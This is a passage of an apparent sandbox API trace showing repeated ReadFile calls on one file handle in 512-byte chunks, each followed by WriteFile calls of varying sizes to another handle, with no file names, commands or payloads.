lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.854] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.855] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.855] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.856] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x317, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.856] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.857] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x318, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.857] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.858] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x386, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.858] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.859] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.859] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.860] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.860] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.861] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.861] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.862] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.862] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.862] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.863] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.864] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.864] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.865] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.865] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.866] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.866] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.867] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.867] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.868] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.868] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.868] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.869] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.869] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.870] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.870] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x251, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.871] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.871] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x258, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.872] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.872] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.873] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.873] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.873] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.874] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.874] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.875] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.875] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.876] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x327, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.876] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.879] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.879] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.879] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.880] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.880] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.881] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.881] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.882] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.882] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.883] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.883] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.884] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.884] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.885] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.885] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.885] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.886] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.886] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.887] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.887] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.888] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.888] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.889] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x357, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.889] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.890] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.890] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.890] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.891] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.891] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.892] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.892] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.893] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.893] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.894] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.894] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.895] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.895] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.896] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.896] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.897] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.897] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.897] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.898] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.899] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.899] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.899] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.900] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.900] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x395, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.901] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.901] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x309, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.902] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.902] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.903] 